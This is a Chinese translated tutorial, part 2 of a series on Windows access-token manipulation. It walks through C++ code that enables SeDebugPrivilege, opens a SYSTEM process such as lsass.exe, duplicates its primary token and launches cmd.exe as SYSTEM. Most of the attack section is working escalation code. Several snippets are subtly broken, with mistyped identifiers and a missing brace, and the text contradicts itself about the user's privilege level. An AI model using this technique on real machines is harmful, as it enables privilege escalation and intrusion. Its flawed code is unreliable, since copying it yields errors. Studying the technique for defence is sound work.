详解令牌篡改攻击(Part 2)

 

0x00 前言

在前篇文章中(原文译文),我们讨论了系统赋予用户的令牌(Token)及特权(Privilege)相关基础知识。在这篇文章中,我们来讨论令牌篡改攻击(Token Manipulation Attack)的相关技术。为了演示攻击过程,这里我们使用的是C++版的Win API。

 

0x01 相关技术

技术1:以运行在SYSTEM安全上下文中的进程为目标,复制该进程的主令牌(Primary Token),创建具备SYSTEM级别特权的进程。

创建具备较高特权进程的步骤如下图所示:

由于我们希望创建具备SYSTEM级别特权的进程,因此我们需要访问运行在SYSTEM账户下的某个进程。在Windows中,我们无法通过运行在另一个较低特权用户下的进程来访问SYSTEM级别的进程。为了访问SYSTEM进程,调用方进程令牌中必须启用SE_DEBUG_NAME特权。

在前一篇文章中,我们知道标准用户并不能使用这些“上帝模式”特权,而位于管理员组且具有提升令牌(Elevated Token)的用户可以使用这些“上帝模式”特权。因此,为了完成该任务,我们需要满足一个条件:用户必须位于管理员组中。这意味着我们必须通过某种方式(比如绕过UAC或者其他漏洞)获取高级别用户访问权限。

备注:2017年,来自Google Project Zero的James Forshaw做过关于“滥用访问令牌绕过UAC”的演讲,其中Forshaw成功从未提升进程中复制了已提升进程的令牌。微软在2018年10月份修复了该bug,Forshaw也在后续文章中确认了这一点。大家可以参考这3篇文章([1][2][3])了解更多信息。

一旦用户位于管理员组,我们就可以启用SE_DEBUG_NAME特权。对于管理员组中的用户,该特权默认情况下处于禁用状态,但对于本地系统,该特权默认处于启用状态。

为当前进程启用该特权的代码如下所示:

BOOL EnableTokenPrivilege(LPTSTR LPrivilege)
{
    TOKEN_PRIVILEGES tokenpriv;
    BOOL bResult = FALSE;
    HANDLE hToken = NULL;
    DWORD dwSize;

    ZeroMemory(&tokenpriv, sizeof(tokenpriv));
    tokenpriv.PrivilegeCount = 1;

    if (OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken) && LookupPrivilegeValue(NULL, LPrivilegeSE_DEBUG_NAME, &tokenpriv.Privileges[0].Luid))
    {
        tokenprivp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
        bResult = AdjustTokenPrivileges(hToken, FALSE, &tokenpriv, 0, NULL, NULL);
    }
    else
    {
        _tprintf(L"Open Process Token Failed with Error Code: %d\n", GetLastError());
    }

    CloseHandle(hToken);

    return bResult;

代码执行的步骤如下:

1、以参数形式传入我们希望启用的特权,然后声明一个TOKEN_PRIVILEGES结构(tokenpriv),该结构中包含与令牌有关的特权信息。

2、然后使用OpenProcessToken()打开当前进程的令牌,将返回的句柄保存在hToken句柄中(我们没有使用OpenProcess()来打开进程句柄,而是通过GetCurrentProcess()函数直接访问当前进程)。

3、使用LookupPrivilegeValue()函数获取指定特权的LUID值(本地系统利用该值来识别特权)。我们将LUID值保存到之前声明的tokenpriv结构中。

4、如果OpenProcessToken()LookupPrivilegeValue()都执行成功,那么我们将tokenpriv结构的Privilege属性设置为SE_PRIVILEGE_ENABLED,准备启用该特权。

5、然后使用AdjustTokenPrivileges()函数,为指定令牌启用该特权。我们以参数形式传入令牌句柄hToken以及TOKEN_PRIVILEGES结构(其中包含相应的特权及属性),如果函数执行成功,那么指定的特权就会被成功启用。

当Debug特权启用后,现在我们可以打开SYSTEM级进程的句柄,相应的代码片段如下所示:

HANDLE hProcess = NULL;
int pid = _wtoi(argv[1]);
hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, TRUE, pid);
if (!hProcess)
{
        _tprintf(L"Cannot Open Process. Failed with Error Code: %d\n", GetLastError());
        CloseHandle(hProcess);
}

代码执行如下操作:

1、声明句柄HANDLE hProcess,以保存进程句柄。

2、使用OpenProcess()函数打开通过pid变量指定的进程ID所对应的句柄,pid值可直接设定,或者作为用户输入传入。这里我们以命令行参数形式传入该值。

3、在OpenProcess()函数中,第一个参数为希望获取的访问权限。这里我们使用的是PROCESS_QUERY_INFORMATION,以获取诸如令牌、退出代码以及优先等级之类的信息。如果大家想了解打开进程句柄时可以使用的进程安全特性及访问权限,可参考此处了解更多信息。我们需要根据具体需求使用相应的访问权限。

4、如果函数执行成功,我们就可以在HANDLE hProcess中获取指定进程的句柄。

接下来就是从已打开的进程句柄中打开进程令牌。我们的主要任务是打开目标进程的进程令牌,复制该令牌,使用复制的令牌创建一个新的进程。令牌同样具有安全权限以及访问参数,这些信息用来定义我们需要获取的访问级别。

打开进程令牌的代码片段如下所示:

HANDLE hToken = NULL;
if (!OpenProcessToken(hProcess, TOKEN_QUERY | TOKEN_DUPLICATE, &hToken))
{
    _tprintf(L"Cannot Open Process Token. Failed with Error Code: %d\n", GetLastError());
    CloseHandle(hToken);
  CloseHandle(hProcess);
}

步骤如下:

1、声明HANDLE hToken,用来保存令牌句柄,然后使用OpenProcessToken()函数打开指定进程的令牌。在进程句柄参数中,我们传入hProcess句柄,该句柄来自于OpenProcess()函数。

2、在第二个参数中,我们需要使用复制令牌所需的权限。这里我们指定的是TOKEN_QUERY以及TOKEN_DUPLICATE访问标志,以便复制所需的Primary令牌。

备注:

  • TOKEN_QUERY:用来查询访问令牌
  • TOKEN_DUPLICATE:用来复制访问令牌

3、传入hToken,以保存返回的令牌句柄。如果OpenProcessToken()函数执行成功,那么hToken句柄中将保存目标信息。

现在我们的主要任务是从已打开的令牌句柄中复制Primary令牌,为了完成该任务,我们可以声明一个新的HANDLE,用来保存复制令牌。为了复制目标令牌,我们可以使用DuplicateTokenEx()函数。

根据微软文档,DuplicateTokenEx()函数的原型如下所示:

现在我们已经通过OpenProcessToken()函数拿到一个令牌句柄(hToken),对于dwDesiredAccess参数,这里我们可以使用MAXIMUM_ALLOWED,这样就可以使用与已打开令牌对应的所有可用的访问权限。对于安全属性参数,我们传入NULL,使用默认的安全描述符。

现在我们需要定义模拟(Impersonation)级别,用来定义我们可以在哪个级别上模拟目标进程。

我们希望在本地系统上模拟目标进程的安全上下文,因此根据上述常量,这里我们可以使用SecurityImpersonation常量作为模拟级别,这里需要使用SECURITY_IMPERSONATION_LEVEL枚举类型。

接下来我们需要指定待复制的令牌类型。在Part 1中,我们知道令牌包括两种类型:Primary以及Impersonation令牌。由于我们正在创建一个新进程,因此需要使用Primary令牌。其实我们还可以使用Impersonation令牌来创建一个新的进程,因为DuplicateTokenEx()函数会帮我们将Impersonation令牌转换为Primary令牌。然而,当我们想模拟某个进程,而不单单是创建新进程时,我们必须使用Impersonation令牌。这里我们需要使用TOKEN_TYPE枚举类型。

使用DuplicateTokenEx()函数的代码片段如下所示:

HANDLE NewToken = NULL;
BOOL DuplicateTokenResult = FALSE;
SECURITY_IMPERSONATION_LEVEL Sec_Imp_Level = SecurityImpersonation;
TOKEN_TYPE token_type = TokenPrimary;
DuplicateTokenResult = DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, NULL, Sec_Imp_Level, token_type, &NewToken);

if (!DuplicateTokenResult)
{
    _tprintf(L"Duplicate Token Failed with Error Code: %d\n", GetLastError());
    CloseHandle(hToken);
      CloseHandle(NewToken);
}

这里我们使用Sec_Imp_LevelSECURITY_IMPERSONATION_LEVEL枚举类型)来定义模拟级别(SecurityImpersonation),然后使用token_typeTOKEN_TYPE枚举类型)将令牌类型定义为TokenPrimary。对于最后一个参数,我们使用的是NewToken新令牌句柄,用来接收复制的新令牌。

如果函数执行成功,HANDLE NewToken将保存新复制的令牌。

完成令牌复制过程后,我们将使用新复制的令牌创建一个新进程,这里我们使用的是CreateProcessWithTokenW()函数。

根据微软文档, CreateProcessWithTokenW()函数原型如下所示:

根据函数原型,我们需要提供NewToken句柄(也就是已复制的令牌)。然而根据官方文档,该令牌必须具备TOKEN_QUERYTOKEN_DUPLICATETOKEN_ASSIGN_PRIMARY访问权限。如果我们观察上文的OpenProcessToken()代码,会发现我们只设置了TOKEN_QUERYTOKEN_DUPLICATE访问权限,然而在DuplicateTokenEx()代码中,我们使用了MAXIMUM_ALLOWED访问权限,这样就能使用正在复制令牌的所有访问权限,其中就包含TOKEN_ASSIGN_PRIMARY访问权限。如果令牌句柄中不存在TOKEN_ASSIGN_PRIMARY访问权限,那么就会出现拒绝访问错误,无法成功创建进程。

使用CreateProcessWithTokenW()函数的代码片段如下所示:

STARTUPINFOEX startup_info = {};
PROCESS_INFORMATION process_info = {};
BOOL CreateProcTokenRes = FALSE;

CreateProcTokenRes = CreateProcessWithTokenW(NewToken, 0, L"C:\\Windows\\system32\\cmd.exe", NULL, CREATE_NEW_CONSOLE, NULL, NULL, &startup_info, &process_info);

if (!CreateProcTokenRes)
{
    _tprintf(L"Cannot Create Process With Token. Failed with Error Code: %d\n", GetLastError());
    CloseHandle(NewToken);
}

在该函数的lpApplicationName参数中,我们传入希望运行在新令牌安全上下文中的应用名称。这里我们以cmd.exe为例,使用新令牌创建一个新的cmd.exe进程。

在代码开头处我们声明了两个结构:startup_infoprocess_infoSTARTUPINFOEX结构用来指定新进程的属性。比如,我们可以修改进程的父进程、设置进程是否具有子进程等。如果想设置进程属性,我们可以使用InitializeProcThreadAttributeList()UpdateProcThreadAttribute()这两个函数(现在我们还不需要修改相关属性)。PROCESS_INFORMATION结构用来接收进程相关信息,比如进程及线程句柄、进程ID、线程ID等。

如果函数成功执行,那么我们就可以在新令牌的安全上下文中启动新的CMD进程,而新令牌源自于已有的某个SYSTEM进程。

执行结果如下所示:

在上图中,652lsass.exe的进程ID,该进程未经保护,运行在SYSTEM安全上下文中。如上图所示,调用方用户运行在Subzero0x9用户的安全上下文中,该用户为具备提升令牌的标准用户。该进程并没有启用SeDebug特权,因此我们首先启用debug特权,然后完成令牌篡改攻击。一旦程序成功执行,就会弹出新的CMD窗口,且目标进程运行在nt authority\system(即SYSTEM)安全上下文中。

现在我们可以使用Process Explorer工具,查看新生成进程的相关信息,如下图所示:

我们新生成的cmd.exe进程的PID2732,该进程对应的用户为SYSTEM,这意味着该进程运行在SYSTEM的安全上下文中。此外,我们还可以看到新生成进程的SID、登录会话以及已启用的特权,这些信息与SYSTEM级别的进程保持一致。

 

0x03 总结

在本文中,我们探索了在SYSTEM安全上下文中创建进程的相关技术,通过打开SYSTEM级别进程的句柄,复制目标令牌,然后使用已复制的令牌生成新的CMD进程。在这种场景中,我们重点关注的是进程的Primary令牌。在下文中,我们将探索模拟令牌的其他技术。

(完)